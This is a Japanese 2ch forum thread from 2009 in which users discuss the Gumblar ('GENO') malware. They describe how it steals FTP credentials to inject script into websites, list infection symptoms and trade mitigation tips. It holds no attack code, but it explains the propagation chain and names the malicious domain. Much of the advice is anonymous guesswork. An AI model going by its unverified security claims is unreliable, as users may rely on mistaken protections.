通常のウィルスは、単純にＰＣを起動不能にしたり、データを消したりという、いわば自己損害で完結するものが殆どです。
しかし、コレは違います。
仮に自分が感染していたとしたら、穴を掘って埋まってしまいたいぐらい他人に申し訳ないと思うくらい悲惨なウィルスです。
自分のサイトにアクセスしに来てくださった人の ID/Passを盗み、あまつさえ画面キャプチャの送信機能やら Botnet汚染やらが指摘されている最悪のバックドアなのです。
そんなウィルスに感染しているサイトを見逃して笑っていることもできず、友人と協力して Mailを送り、何とか感染サイトを止めて欲しかった。
しかし、そんな努力がかえって一部の方の反感を買っってしまったことが非常に残念です。
残念ですが、今後はもう、感染サイトを見ても「ミテミヌフリ」をすることになるでしょう。
「自分たちだけが感染しなけりゃいいよね」という、情けない姿勢に切り替えざるを得ないことを恥ずかしく思いますが、所詮は個人サイトですから、責任をとることも出来ませんので・・・・
あと、ブロック範囲が広すぎるという指摘も受けましたが、そんなもんは自己判断してください。
というか、ブロックの意図がわからないなら、別にブロックしなくていいんですよ？
私が「ブロックするように！」と命令しているわけでは有りません。

よし、愚痴完了！
通常モードに移行します。

>>254
乙

>>230は>>238？
自分のサイトを持っていない、という前提においては
自分の好きなようにすればいいのでは？
検出されなかったんでしょ？
過去ログを見ないどころかちゃんとレスもあるのに
それでも色々聞いてくるのだから
こちらとしてはもうどうしようもない。
出来れば今後コテハンでもつけてくれれば
あぼんできるのでお願いしたい。

>>254
かわいそうに

>>254
>一部の方の反感を買っってしまったことが非常に残念です

なんで反感買うのか分からん･･･

小林製薬からの流れでスレにきました
IPブロックとかしたことないけどこれから作業にとりかかる

日本人ってのは尻に火が付いてからじゃないと動かない性癖があるからね
しかも、もう火が付いてますよ？って忠告してるのに信じない奴までいるんじゃ
個人レベルの活動ではどうしようもないわ
もはや自己責任で破滅するなり立ち直るなりしてくれとしか言い様がない

どのサイトだか忘れたが感染してたみたいだけど連絡先なかったから閉じた

>>258
「ウチのウイルスチェッカーだと検出しなかったのにウチの名前を挙げやがった！
ウチのイメージを貶めやがってふてえやろうだ！」

>>252
それ気になってるんで、サポートに聞いてみます

>>262
それ、ただの馬鹿じゃんｗ

良識と知識を持ち合わせた人に被害がおよび
知識も良識もない人が被害を拡大させる

>>172
そこは酷いな…わざとやってんだろって感じに（他は１つなのに）スクリプト22バージョン入れてやがるｗｗｗ

せめてバスターとかで完全駆除できるようにならないのかな

アンチウイルスでまだ対策できてないのも油断を生み出してるよね

告知なしで再開してるサイト名＋改ざん
で毎日ググることにしました
というか、2週間以上前からやってますがｗ

他のキーワード『サイト名　改ざん』が出る日を願って

トロイの木馬って昔からあるじゃん

ウイルスバスターはこの手の対応いつも遅いからなぁ

>>262
ひでえええええええええええええｗｗｗ

ここに晒せないのが同人サイトの奴は同人板にスレたったからそこで報告頼む
http://changi.2ch.net/test/read.cgi/doujin/1242391122/l50

告知無しで再開ってGENO以下の対応だなｗ

友人に、前回のgeno騒動の時に懇切丁寧に恐ろしさと対策教えたのに
事の重要性を理解しないで生返事。
後日感染して泣きついてきやがった。

この怒りをどうすべきか。。

何？
結局はWin7超勝ち組って事？

>ID/Passを盗み、あまつさえ画面キャプチャの送信機能やら Botnet汚染やらが指摘されている最悪のバックドアなのです

怖いｗ

>>276
でもVistaもWin7もいつ狙われるかわからん

JavaScript切ったまま問題のWebページアクセスしてもavastさん警告してくれる？

どっかのニュースサイト（gigazineとかj-castあたりは乗りそう）にタレこめばいいのに

ここもage進行にしたら？

>>275
ほっときゃいいじゃん　いい薬だ
「だから言っただろ　何で注意したのに聞かなかったのよ？
それってつまりは俺が信用できないってことだろ？何で信用できないヤツに聞くの？
○○（そいつが使っているアンチウイルスソフトの会社）に泣きつけばｗｗｗ？」
とでも言ってやれ

今日昼間IEで色々調べまくってたらいきなりAdobe Readerが起動したんです、バージョンは7.0
どっか間違えて押したのかと思ってすぐ閉じたんだけどこれって感染したって事ですか？

>ID/Passを盗み、あまつさえ画面キャプチャの送信機能やら Botnet汚染やらが指摘されている最悪のバックドアなのです

これに昔のトロイのドナルドみたいにBIOSを吹っ飛ばす様になったら・・・怖すぎる。

>>275
それはもう友人と呼ばなくてもいい
このまま付き合えば、いずれお前にもっとひどい迷惑を持ってくる疫病神

上っ面的な付き合いを暫く続けてりゃすぐ消えていくよ

>>283

感染した可能性が高いな

しかしこのウイルスは危険だと言っても、文字にするとインパクトがいまいち薄いな
きんたま系の方が結果的にもインパクトあった

>>279
GDATA(avastエンジン)だけど、Noscriptで切ってても感染したページにアクセスするとアクセス拒否される

>>270
昔からあるけど、今回のケースはAdobe Reader経由という点が問題かと
Windows Updateを自動更新してるしアンチウイルスも自動更新してるから問題ない
という油断を突いた危険な存在
さらに言えばウイルス本体はgumblarの直行便だから
gumblar側で常に新種を生み出せる
そのせいでアンチウイルスソフトも対応しきれない

>>282
>>285
自分が軽んじられてるんだなと認識するいい機会になったｗ
それを念頭においた考えで付き合う事にしたよ。

Adobe Readerアンインスコしたらセフセフ？

>>288
thx、反応してくれるんだ
んじゃ反応したら報告するわ

とりあえず>>9の対策施したうえで、
avira様と一緒に問題サイトを訪問して、
avira様のご活躍を拝んでみたいんだが、大丈夫？

AntiVirは対応したのかな　ｵﾛｵﾛ、ｵﾛｵﾛ

>>288
> >>279
>Noscriptで切ってても感染したページにアクセスするとアクセス拒否される
これはNoscript使って許可して無くても感染したということ？
オレが分盲気味で申し訳ないが解説ヨロ

今北産業　とりあえずしばらくの間ﾈｯﾄｻｰﾌｨﾝは自粛しとくか

うんざりなんでAdobe Readerをアンインストールしました
ここ一年ほど必要だった記憶がありませんので

>>289
公式資料ではpdfファイルでアップされてるのが多いからなあ。
Adobe Readerに対しては2000年には既に当時のAbode Acrobat Readerについて
日本のセキュリティ研究家が世界に先駆けて受動態攻撃として報告していた。
まさか今になって予言が当たるとは。

>>290
いやそこまで冷たくしてやるなよ
俺らだってセキュオタになる前は説明されたって訳わかんなかったろ？
その友人も今後はウイルスへの危機意識を持つだろうさ

他にPDF読むソフトでなんかいいのないの？

インフルエンザより怖いな
(((( ；ﾟДﾟ)))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ

Adobeはなんか言ってるの？

>>295
いや、もっと説明する。

具体的にはNoscriptでJavascriptをオフにしたまま感染したページにアクセスしようとする。
GDATA=avastがこのページにウィルスコードが入ってると判断して止める。

『感染を止める』のでは無く、『ページそのもののアクセスを止める』のが正しい。　だからJavascriptで切ってようが対策されてるPCならそのページは見れない。

情強の人に他のPDFソフトでオススメの話も聞きたいな。
foxit使ってはいるけど、あれにも脆弱性報告あるからなぁ。

>>303
了解、ありがとう

AcrobatReaderはともかくFlashPlayerの脆弱性はなんとかしろよ
穴だらけなのにFLASHオンリーのサイトがガンガン増えやがる･･･
サイト自体が糞重いことも多くて最悪

>>304
俺も知りたいな･･･仕事でどうしても必要だし

カスペオンラインスキャンのデータベースアップデート全然進まん(´・ω・｀)

>>204
やべえ。
Kasperskyで暗号化された通信をチェックするのに
サーバー証明書を代理認証してるんだが、これだとほとんどの場合認証が通らない。

たとえば、Firefox3のヘルプから更新の確認を選んでも、
認証が通らないもんだから、最新バージョンかをチェックできない。
（自分で手動チェックしているから、それはいいんだけど）

それと同じで、ブラックリストを読み込みにいけてなかったわ多分。
セキュリティーを上げているつもりが、下げていたっぽい。

なにはともあれサンキュー。
勉強になったわ。
Kasperskyユーザーもいると思うので、チラ裏っぽいが、書き込み。

>>308
もうすでに20分は経ってるだろうにまだ20％にも満たない…

>>226
だいぶ後ですね、というよりいつも蔓延後にTVニュースです。
あと数週間で大騒動になると思います。
ですが、今すぐレッドアラート発令しないと取り返しがつかなくなります。

いきなりPDF to Data EX
ttp://www.amazon.co.jp/dp/B001AOKBU4

これはどんなソフトなの？
Adobe Reader無くてもtxtに変換してくれるのかな

（１）感染してるサイトを閲覧する
（２）自分のパソコンが感染する
（３）その状態でFTPで自分のサイトを更新する
（４）その時にFTPのIDとパスを抜かれる
（５）ウイルスが勝手にHTML、ｐｈｐファイル等に
不正なジャバスクリプトを埋め込む
（６）サイトが感染状態になる。
（７）そのサイトを見た人が感染する

■もっと詳しく解説すると
1) どっかの感染している index.html やら index.php やらを持ったサイトを、
自分のサイトのコンテンツを FTP で更新する担当の人がアクセスする

2) 担当の人の PC にトロイが侵入する

3) 2) で侵入したトロイは、担当の人が FTP で
自分のサイトにアクセスするのを待ち続ける
4) 担当の人が感染した PC から FTP で自分のサイトを更新すると、
トロイがその様子をチェックしていて、そのサイトにアクセスした
ログイン名とパスワードを盗み取る

5) トロイはしばらくすると自動的に、4) で盗んだパスワードを使って
そのサイトにアクセスし、index.html やら index.php やらをこっそり書き換えて、
そのサイトに感染コードを仕込む

5') もしうまく作ってあるトロイなら、ローカルの PC にある
自分のサイトに上げるためのファイルのローカルコピーにも、
同じ感染コードを仕込むだろう。

6) 1) に戻る

>>310
時間かかるんだよねあれｗ
しかもやるたび毎回初めからｗ

え、そんなに大変な問題なの！？

これから何が起きるの？

■なんでこのトロイって危ないの？
1) 個人情報とか盗まれる
2) acrobat reader/flashという普及したアプリケーションの脆弱性をついている
IE、Windowsのセキュリティを更新してる人でもacrobat readerのセキュリティについて
対策してる人が少ない
3) ウェブサイトを変更する権限を持った人のPCに感染すると、 そのサイト自体が感染元になる可能性がある
4) 新種のウイルスが作られやすく、アンチウイルスソフトで対抗しにくい


コピペのつなぎ合わせだけどこんな感じなのかね？

FLASHやpdfファイルなんていらない
htmlでいいじゃないか

sqlsodbc.chm のチェックってどうやればいいのですか？
初心者ですいません・・・

vistaはどうなんだ
sqlsodbc.chmは元々ない？

>>172
avastはスクリプトに反応するが
バスターのURLフィルターの反応が無かったので
Gumblar.cnに直接Pingすると一時閉鎖しているな

acrobat readerじゃなくてadobe readerね。
バージョンアップして呼び方が大分前に変わったよね。
機能面でも色々追加されてさ。

なんかのソフトに付いてた
acrobat reader5を使い続けてるおれは
どうしたらいいの？

思わずブラウザをChromeに変えたんだが、意味あるんだろうか？
（感染したサイトを遮断してくれるらしい）
誰か試してくれ

ところでこの犯人はなにか得するのか？

他の国では問題になってないのか？

>>236
195
そもそも、この gumblarは zlkon の頃からずっと取り上げてきたので、
gumblarの爆発的な感染を察知したときに、
「無視する」というオプションをとることができませんでした。

通常のウィルスは、単純にＰＣを起動不能にしたり、データを消したりという、
いわば自己損害で完結するものが殆どです。
しかし、コレは違います。

仮に自分が感染していたとしたら、穴を掘って埋まってしまいたいぐらい
他人に申し訳ないと思うくらい悲惨なウィルスです。

自分のサイトにアクセスしに来てくださった人の ID/Passを盗み、
あまつさえ画面キャプチャの送信機能やら
Botnet汚染やらが指摘されている最悪のバックドアなのです。

そんなウィルスに感染しているサイトを見逃して笑っていることもできず、
友人と協力して Mailを送り、何とか感染サイトを止めて欲しかった。

しかし、そんな努力がかえって一部の方の反感を買っってしまったことが非常に残念です。

>>324
クレカの番号抜けるのにウハウハじゃない訳が無いだろ

誰かアクロバットリーダーで踏んでくれよｗ
おれも5か6なら持ってんだよな
古いのをスルーしてくれるなら入れ直す

中国

>>325

残念ですが、今後はもう、感染サイトを見ても「ミテミヌフリ」をすることになるでしょう。

「自分たちだけが感染しなけりゃいいよね」という、
情けない姿勢に切り替えざるを得ないことを恥ずかしく思いますが、
所詮は個人サイトですから、責任をとることも出来ませんので・・・・

あと、ブロック範囲が広すぎるという指摘も受けましたが、
そんなもんは自己判断してください。
というか、ブロックの意図がわからないなら、別にブロックしなくていいんですよ？

私が「ブロックするように！」と命令しているわけでは有りません。

　　★GENOウイルス無料パンデミックキャンペーン延長のお知らせ★

　　　　　　　　　　　■新亜種続々配信中■

そろそろPDFビューアは何がいいとかの話は
フリーのPDFビューアー総合スレ Part 1
http://pc12.2ch.net/test/read.cgi/software/1184435342/
に逝け。

>>323
//gumblar.cn/

警告: このサイトにアクセスするとコンピュータに損害を与える可能性があります。
gumblar.cn のウェブサイトには、コンピュータに損害を与えたり無断で動作する不正なソフトウェアが含まれている可能性があります。
不正なソフトウェアを含むサイトにアクセスするだけでコンピュータに感染する場合があります。
問題の詳細については、gumblar.cn に関する Google セーフ ブラウジング診断ページをご覧ください。
オンラインの有害なソフトウェアから保護する方法についてはこちらをご覧ください。
このサイトにアクセスするとコンピュータに損害を与える可能性があることを理解しています。

>>322
多分大丈夫だろ。
設定項目にjava scriptの項目もないし。
多機能なadobe readerとは違う。
心配ならアンインストールしちゃいなよ。

>>331
お前が行ってまとめ貼れよカス

>>306
某サイトがウィルス仕込まれた時に、
お詫びと共に見舞金（チケット）まで振舞った。
Javaを使わないようにアップデートするのかと思ったら、
全然そうじゃなかったからな。

>>323
ChromeってJavaとかプラグイン関連をどこで切るんだ？
一週間くらい前にぐぐったが、見つけられなかった。
Chromeで得られるフィッシングガードだけに頼るより、
Firefox+NoScript+プラグイン全オフ
の方がいいと思う。

AdobeReader側でもJavaScriptを予め切っておいたし、PDFはローカルでしか開かない。

やばい時期にGENOのHPに毎日アクセスしてたけど、おれはこれで免れた。

>>323
感染したHPは開いたよ

>ブロック範囲が広すぎるという指摘も受けましたが

少なくとも自分の身を守るためにブロックするはずなのに
なんでいちゃもんつけるやつがいるんだよ・・・

GENO zlkon gumblar

なんて読むの？
げの、ずろこん、がんぶら？

>>333
JavaScriptを読めるか否かが問題なの？
とりあえずブラウザでPDF表示しないように設定してみた

はやく犯人を逮捕しろ！

じぇの、じるこん、ぎゃんぶらー
って読んでた

返答くれた方、サンクス。やっぱ安心というワケじゃないな。
IEでJS全部切ってた使ってたんだが、やっぱいろいろ面倒でChromeで遮断してくれるなら
こっちがいいかと思って。
考えつつ使い分けるよ。

>335
Chromeにはないんだよ＜JS等を切る
ちょっと勇気がいる。が速いことは速い。

HPやってる奴は自分のHPみりゃ感染がわかるわけか

>>341
俺がいる
たまに「がんぶらー」と読むが

あれ？flash playerの方って最近アップデートしなかったっけ？勘違いか？
今使ってるのは10,0,22,87だけど、これいつアップデートだっけ

え、なに？
旧ヴァージョン最強なの？
Acrobat Readerとかいまどき使えるの？

データベースアップデート終わらん
めげるわ

VTの暗号化通信が死んでないか？
http://www.virustotal.com/jp/
何度やっても平で通信しやがる。

Gmailのアカウント入力画面とかはちゃんと暗号化通信されるので、うちの環境だけとは考えにくいんだが・・・

>>345
それが最新で合ってる（少なくても今朝までは）。

>>250
ハッ！もしかしてｹﾞｲﾂの陰謀かｗ
あまりにもVISTAの評判が悪いのでやっちまったかｗ

>>254
一部の人って誰だろうな？感染したサイトの管理者とかかな？

仮に大丈夫だとしても別の問題がありそう。
アンインストールしちゃいなよ。

>>341
ありがと、これからそう読みます

>>342
大きなお世話だけどfirefox noscriptt にすれば？


PDFスレざっと読んだけど、
PDF-XChange Viewerかfoxitかなぁ。

>>299が当の友人だったら笑う

それとGnomeの人、不定期でいいからメールで感染サイトの
ニュース配信してくんないかな…　速効で登録させてもらうのに

それか酉つけてここに書き込むとか

>>350
PDFはなにで読むのが一番？
最新版なら安全なの？

>>354
>>352

GENOってジーノって読むんだとばかり

>>352
>>354
XChangeViewer
俺もさっきアップデートしたぜ。

本家の窓の杜でDLしてハッシュ比較したが、差異がなかったんで、大丈夫そう。

インストールのときFirefoxとIEのプラグインを入れるか？
ときかれるので、入れないを推奨。

>352
FireFox、操作性がいまいち好きになれないんだ、すまんｗ
Chromeはいいねー。今回の騒動で乗り換える決心がついたのはよかった。

結局ブラウザに関係なく、JS生かしつつAdobe Reader更新せずに使ってたらアウト、
なのかな？

インストール不要のリーダー無いのかなあ

Vistaで狐使いは大勝利！？

Vista使ってる時点で負け組だろ

XPが唯一の勝ち組

�d�d
XChangeViewer 試してみる

あどびバイバイ

感染したらウィルス対策ソフトのアップデートができなくなるみたいだけど
どの対策ソフトなんでしょうか...

調べ物したいけど何処が感染してるか分からないので
下手にネット検索できんなあ

>>364
マカフィーはＨＰにつながらなくなるって報告あり。
GENOかどうかは未確定。

Vista使ってる奴は情報弱者

海外でも話題になり始めたな
ってか感染が増えたから話題になったのか、話題になったから感染が増えているのか
http://news.google.com/news?ned=us&hl=en&q=gumblar&cf=all&scoring=n

http://www.pcworld.com/article/164899/gumblar.html?tk=rss_news
Tennis.comやVariety.comを含む1500以上のサイトが感染され、どんどん増えている
この攻撃は先週より８０％の割合で増え、昨日と比べて188％増えたという

http://www.computeractive.co.uk/computeractive/news/2242351/gumblar-attacks-continue
ソフォスによると、4.5秒後とに増えている

>>368
豚インフルどころじゃねーなｗｗｗ

XP使い=人生の勝ち組
Vista使い=人生の負け組

fire fox使いずらいからIE使い続けたいんだが、IEじゃ何の対策もできないの？

Vistaを利用してる奴は、たいてい自宅警備員なんだよなw

Donutとかでも禁スクリプトの設定があるよ。

>>358
firefoxはアドオン色々いれたり試行錯誤しないと使いづらいから、
その辺面倒だよね。

俺も最初は慣れなくて嫌だった。

>>371
使いやすいと思って使っておりましたorz

Vista利用者は氏んだほうがいい。

>>371
VistaのIEだとスクリプトをOFFらなくても問題ない
感染サイトを踏んでも94.229.65.172へ接続するログは記録されてなかった

入れたはいいけどすぐに放置されたubuntuが活躍する時が

Vista＝キモオタ


XP＝普通の人

vistaを使っているというだけで、この叩かれようとは…

なんか急に雑音が

PDF-XChange Viewerって
セキュリティ的にはどうなの？

誰だよ基地外を呼んだのは

Vista厨うざすぎ、スレ違いも理解できないのかよ

疑心暗鬼になるわ

Vistaはいらない子

VistaはGENOウイルスのスクリプトを無毒化して水際で阻止する。
仮に飛ばされてもUACがファイルを保護する。

これまで出てる対策法以外で何かやってる人いたら教えてほしい

Vistaは二代目Meだろwww

hostsファイルに危険サイト記述
同様にルータにも記述

>>1の・Acrobatが勝手に起動
これ当てはまるわ（（（（ ；ﾟДﾟ）））
あとは何もないしニフティのオンラインスキャンも異常なしだけど再インスコか・・・

win2000 アクロバットリーダー５．０　フラッシュ最新で
GENO行ったけど何とも無い

上ででてる対策法はやってみた
ブラウザはopera使ってるんだけど設定いじった方が良いところあるかな

話そらそうとしてるのか？

>>391
あとは何も無い…って本当かよ
一応>>1に書いてあること、全部チェックしたほうが良い

>>392
GENOはもう対策されてる…かもしれない。

XP>>>>>>>>>>>>>>>>>>>>>>>越えられない壁>>>>>>>>>>>>>Vista

win7が出るまで我慢して乗り換える奴多そうだな
さうがにこれの件でビスタのセキュリティ証明されたからなｗ
でもビスタにするなら７にするわって事で

Vista？XP？だから何？
大切なのは個々が感染しないことであり、拡散させないことだろ？

豚ｲﾝﾌﾙがまだ蔓延していない日本は勝ち組、既にしている他の国は負け組とでも？

本質から目を逸らすために、どうでもいい対立構図を持ち出すヤツが
わらわら沸いてきた時は、「朝日新聞」と決め付けると何故か妙に納得するｗ

>396
いや、まだ騒がれ始めた頃の感染されているとき。

ここもニュー速と同レベルだな ('A`)

今んところVista使いには関係ないんだから、こなきゃいいのに･･･

MSが得をするのか

所詮2chだからねw

まあ感染者が増えれば変なの輩も増える。
変なのは無視無視

>>392
アクロバットリーダー5は
JavaScript読み込まないとか？

余計なサイトを見なけりゃ多少防げると思ってたが
小林製薬とか…

分かった分かった
間をとってマックが最高ってことで

遅ればせながらFirefoxスクリプトオフってきた
しかし先日クリーンにしたときにAdobe入れ忘れてたのは天恵だったのね

ちきしょうーVistaがなんだ！オレもwin2000でガンバルぞ！

vistaの話するくらいならGENO対策におすすめなセキュリティソフト教えれ

>>411
おすすめなどない　以上

　　　〃∩ ∧＿∧
　　　⊂⌒（ 　・ω・）　　はいはいVista最高最高
　　　　 ｀ヽ_っ⌒/⌒ｃ
　　　　　　　 ⌒ ⌒

>>391
流れとしては下記だと思うのでその時のreaderが最新ならば大丈夫・・・かも
確信は持てない

改ざんサイト閲覧
　↓→ avast等がアクセス拒否
acrobat readerが開く
　↓→ JavaScriptオフ または acrobat reader最新版
acrobat readerのJavaScriptでgumblarへ飛ぶ
　↓→ ルータ側でgumblarへのアクセスを拒否(できるか不明)
ウイルスダウンロード
　↓ もうとめられない
感染
　↓
＼(^o^)／

オレは2000で戦うぞ

アクロバットリーダー5の設定の中には
JavaScriptの項目は見当たらない…

Win2000にはsqlsodbc.chmは無いといわれてるけど
俺のにはあるな
最近XP使ってるんで4/20以来起動してない
MD5：f639afde02547603a3d3930ee4bf8c12
SHA-1：fbdd32ed13d27e4102621e1067fdf3634f33b2c3
XPと同じだけど問題あるのかな

既になかったことにされようとしてるVista

>>418
Vistaの話はいいって

やめろ！ビスタ厨のﾌﾘをした煽りを相手にするな。

もし大手のサイトが感染したら困るね

NGワード Vista

>>368
それでニュース板でスレたたないかな。

僕はwin3.1ちゃん！

以降このスレはVista厨とXP野郎が罵り合うスレになりますた

sqlsodbc.chmが改変されてるかどうかは更新日時を見ればいいの？

Vista（笑）

ブログから感染、はあるの？
FTP使わないと意味なし？

>>421
マスゴミのサイトが感染してたらすごいことになるわなｗ
色んなとこに飛んだりしてるだろうから、感染していないってどうして言えよう？ｗ

つか検索結果が上位にくるなら逆に喜んでいたりしてｗ

迷惑だから基地外は出て行ってくれ

そしてＧＥＮＯ社員大勝利なんですね、わかります

ところで
>>391とか、他にもcmd.exe、regedit.exeいけるのにsqlsodbc.chm改変されてるとか報告来てるけど
これ更に亜種発生って事？

XChangeViewer は
セキュリティホールって無いの？

俺はギリギリまでXPで粘る

初歩的な質問で申し訳ありません

VistaでFireFox使っているのですが
対策は一体どうしたらよいのでしょうか

今あわててAdobe　Reader　８を更新しようとしたら
Windowsのセキュリティにブロックされ更新できませんでした
これはもう感染してしまったということなのでしょうか？

>>358
アウトになるのは時間の問題だと思う。
ブラウザの脆弱性もしょっちゅうだし、その把握も悪い奴らの方が早かったりしてる。
まじな話、防げる手段はほぼなくて、どれだけリスクヘッジをしていけるか？　って次元。
インフルエンザと同じレベルでヤバイ。

>>359
XChangeViewerにポータブル版があったら、それならインストール不要な気がする。

>>388
それには、これまでの対策まとめをする必要があるな。
>>417
ディレクトリが違ったはず。
>>432
過去にはあった。今は専門家じゃないと分からないだろうけど、ブラウザと関連づけしなきゃいいじゃん。

情弱はこれ忘れんなよ転載

77 geno [sage] 2009/05/15(金) 23:40:54 ID:rKmPYXhz0
プロパティ見たらサイズ：49.5 KB (50,727 バイト)って書いてあるはず
自分も最初ビビった

カスペル起動しながらテレビ見てたら豚インフル速報でびびった
心臓に悪いからどっちのウイルスも早く収束して欲しいな…

youtubeとか感染したら目も当てられん。

情弱専用OSそれがVista

sqlsodbc.chmが改変されてるって事はコレを読み取り専用にしときゃＯＫ？

>>434
ＶＩＳＴＡは大丈夫だって

Vista=ゆとり

>>440
感染の症状の一つをブロックできたらOK？　なわけないじゃん。
風邪になって、熱はあるし、咳もでてフラフラだけど、くしゃみが出ないからOK！　なわけないじゃん。

>>441
ありがとうございます

PDF-XChange Viewer - Portable v.2.04105

これだな
ポータブル版は古いヴァージョンのしかないのか……
大丈夫かな？

>>445
「コレを使えば／やっておけばもう安心！」が最大のセキュリティホールなのをよく覚えておけ
あんまり古いのはあんまり良くないかもな

WINDOWSを最新にアップデートしててもクソの役にも立たなかったということですね

GENO社員うぜ〜

管理下のサイトが感染してた…
もちろん俺のPCも

更新日時を見ると12日だから約3日…
改ざんされたのは1日10PV程の糞サイトだけど、うつした人ゴメンなさい

>>449
ここではなくサイトに明記しろ。

>>449
感染したPCの詳細を

感染はしてないけど一端サイト閉めようかな…沈静化するまで

>>452
その方がいいと思う
あと、PCの詳細を

>>450
そうなんだけど
今はとりあえずアク禁にしてある
もう少し状況がはっきりしないと
謝りの文あげるのも怖い

パンツがヌルヌルになってきたぜ

>>453
XPです。XP。

>>449
CDブートのOSで謝罪文を載せたりFTPのパスを変更してみたらどうだろう

>>454
ところで、何から書き込んでるの？

あと、感染PCから見たグーグルの検索結果まで好き勝手に書き換えるくらいなんだから、
レジストリエディタが起動するから大丈夫とか、安易に考えない方が身のため他人のためになると思う。
TypeA ヘルプファイル書き換え
TypeB ヘルプファイル書き換え & レジストリエディタ起動阻止

とかが、あり得る。
攻撃者は時期を見計らいTypeB から TypeA へ替えることで、発見を遅らせることくらい考えていそう。

ttp://www.itmedia.co.jp/news/articles/0905/15/news097.html
「男の子牧場」炎上、「牧場メーカー」「女の子牧場」などパロディサイト乱立

サイバーエージェントが5月13日に公開した携帯電話向けサイト「男の子牧場」に
対して「男性差別だ」などと批判が殺到し、広報担当者のブログが炎上している。
男の子牧場のパロディサイトも乱立。ネット上で騒ぎになっている。

なんか

【管理も】同人サイト・GENOウィルス注意【閲覧も】
http://changi.2ch.net/test/read.cgi/doujin/1242391122

↑こっちみると、凄い勢いで感染サイト増えてない？

動画サイト経由だろ

増えてるな

ひどい有り様だ

仮想マシンにWin2kPro入れて感染する環境を作りたいんだけど、何入れたらいい？

OCZ Vertex 30GB
というキーワードでググッタ時にトップに来る、有名どころの自作PCのブログなんだけど、
アクセスしたら
lolipop.ジェーピー
の情報をブラウザが読み込んで来るんだが、大丈夫だろうか？

仮にこのサイトがやばいとすると、相当数の自作PCユーザーが冷や汗もんなんだが・・・。
だれか、分かる人頼む。

>>414
adobe readerだから

>>451
XPで数日まえサイトの更新をしようとFFTPを立ち上げたけど上手く繋がらず
仕方ないからレンサバのファイルマネージャーで更新した
今日、avast入れてるPCでたまたま見たら凄い怒られた

サイトの改ざんはindex.htmlとModxのなかのphpが10こほどやられてた

いつ自分が感染したか知る方法はないの？

>>416
そもそも古過ぎてそういう機能が無いから設定項目があるわきゃない。

>>458
携帯

>>461
前から感染してたのを同人板の連中が気づかなかっただけ

>>470
それ、よけいまずいじゃんｗｗｗ

>468
おかげで感染せずに済んだ

>>414
先にgumblar.cnに行って
JSクラックPDFをダウンロードして感染

同人板読んできたけど、同人用語がわけわからんｗ

今、思い出したけど、Flashって
複数のブラウザ使っているなら、それぞれで最新にしないとダメだぞ。
IEのを最新にしてもFirefoxのは古いまま　という仕様だからな。

■■■■■テンプレ希望■■■■■
Flash Player はブラウザごとに最新であることを確認してください。
IEで最新でもFirefoxは古いままだったり、その逆もあります。

なにげに入れといて良かったな、No Script
これからもお世話になるか

家族共用パソコンだから感染したら被害がとんでもないことになる件　しばらくはIE使わないほうがいいな

adobe reader消したらとりあえず安心なん？

>>477
できればＩＥはずっと使わないほうがいんじゃね？
俺はmicrosoftupdate以外では全く使わない。

NoScript + ABP 最強

自分のパソコンはvistaだからいいが職場のパソコンが気になる
だからと言って上司に「ウイルス流行ってますよ」って言ってもどうにもならんだろうし

最終的にadobeが感染したら面白いな

メインPCをメンテ中(M/B等を換装)、サブのノートPC(Win2k SP4)を数日間使用していたが、
見事に感染していた。

×sqlsodbc.chmを改変
　　WINNT\system32に在ったが、ハッシュは合っていた。
○cmd.exe、regedit.exeが起動不能
　　ついでにregedt32.exeも起動不能。
？一部のアンチウイルスソフトが更新不能
　　殆ど使用していないノートPCだったので、そもそもアンチウイルスソフトの類をインスコしていなかった。
○特定サイトにアクセス不能
　　Microsoft Update、Windows Update共に繋がらない。
？ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
　　確認方法が分からない…。
・Googleの検索結果を改竄(リンクを弄る)
・explorer.exeや一部のブラウザが異常終了
・Acrobatが勝手に起動
・PDFファイルやシステムファイルが増殖
・CPU、メモリ使用率がUP
・再起動時にBSOD

>>483
IE / AcrobatReader / Flash Playerのバージョン詳しく！

>>482
いっぺん痛い目見れば
今度から対応早くなんじゃね

adobeは自社製品を使ってなかったりw

Mac OS X10.5.7ですけど大丈夫でしょうか？
心配です

つーかいつもアドビが…

>>487
巣に帰れ

>>479
一応姉と妹にも注意したほうがいいといってはおいたが、二人ともニコ厨だからもし草動画が感染したら…((((;ﾟДﾟ)))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ
それはそうとJaneStyleで画像以外のURLをクリックした時にすぐにIEに飛ばないように設定するにはどうやるんかﾖｸﾜｶﾗﾝ

>>489
ジャバスクリプトはMacでも動くんです....

>>1でブクマ推奨してるサイトはそんな情報あるわけでもないようだが
なんで推奨になってんの？本人？
まとめWikiこそ>>1の一番上にもってきなよ
過去スレリンクなんか>>2以下でいいんだし

>>490
ツール→設定→パス→ブラウザ
これで指定してあげればいいよ

変なexe踏まなきゃ大丈夫って時代は終わったのだね。

>>491
JavaScriptは動いてもMac上ではexeが勝手に動かないから大丈夫だよ

>>491
巣に帰れ

もうやだこんなインターネッツ

コピペブログあたりがコピペしてくれたら注意喚起になりそうだが…

>>492
圧力がかかって該当記事削除された。このスレと前スレ読み返せ

>>484
ｽﾏｿ、途中で送信してしまった…。

メインPCをメンテ中(M/B等を換装)、サブのノートPC(Win2k SP4)を数日間使用していたが、
見事に感染していた。

×sqlsodbc.chmを改変
　　WINNT\system32に在ったが、ハッシュは合っていた。
○cmd.exe、regedit.exeが起動不能
　　ついでにregedt32.exeも起動不能。
？一部のアンチウイルスソフトが更新不能
　　殆ど使用していないノートPCだったので、そもそもアンチウイルスソフトの類をインスコしていなかった。
○特定サイトにアクセス不能
　　Microsoft Update、Windows Update共に繋がらない。
？ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
　　確認方法が分からない…。
？Googleの検索結果を改竄(リンクを弄る)
　　確認方法が分からない…。
○explorer.exeや一部のブラウザが異常終了
　　一昨日、iexplorer.exe(IE6)が異常終了した覚えがある。
×Acrobatが勝手に起動
　　Adobe Reader等のPDFリーダーはインスコしていなかった。
　　Flashで感染？(ここ半年、更新した記憶が無い…。)
×PDFファイルやシステムファイルが増殖
△CPU、メモリ使用率がUP
　　iexplorer.exe(IE6)のCPU使用率が常に50%以上。
×再起動時にBSOD

>>487

小林製薬 (4967) は12日、同社のホームページが何者かによっ
て改ざんされ、ホームページにアクセスするとウィルスに感染す
るようになっていたとして、ウィルス感染が判明したホームページを当面の間、閉鎖したことを発表した。

　同社によると感染が明らかになったホームページは「暮らしの
